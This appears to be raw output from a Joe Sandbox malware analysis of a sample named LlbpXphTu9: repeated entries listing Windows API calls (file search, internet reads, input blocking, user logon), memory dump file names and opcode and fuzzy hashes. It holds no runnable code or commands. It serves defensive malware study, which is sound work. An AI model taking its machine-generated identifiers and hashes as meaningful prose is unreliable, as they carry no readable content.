                                                                                                                                                                            • Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                                                                            • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                                                                            • Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                                                                            • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 48322524-0
                                                                                                                                                                            • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                                                            • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                                                            • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                                                                            APIs
                                                                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                            • String ID: rJ
                                                                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                                                                            • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                            • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                                                                            • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                            • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                                                                            APIs
                                                                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                            • String ID: rJ
                                                                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                                                                            • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                            • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                                                                            • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                            • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 901099227-0
                                                                                                                                                                            • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                                                                            • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                                                                            • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                            • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                                                            • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                                                                            • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                                                            • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0vH$HH
                                                                                                                                                                            • API String ID: 0-728391547
                                                                                                                                                                            • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                                                            • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                                                                            • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                            • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                                                            • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                                                                            • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                                                            • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Proc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2346855178-0
                                                                                                                                                                            • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                            • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                            • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                                                                            APIs
                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                            • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                            • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                                                            • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                            • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                                                            APIs
                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LogonUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1244722697-0
                                                                                                                                                                            • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                            • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                                                            • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                            • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                            • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                                                                            • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                            • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                            • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                            • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                            • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                            • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                            • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                            • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                            • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                            • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                            • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
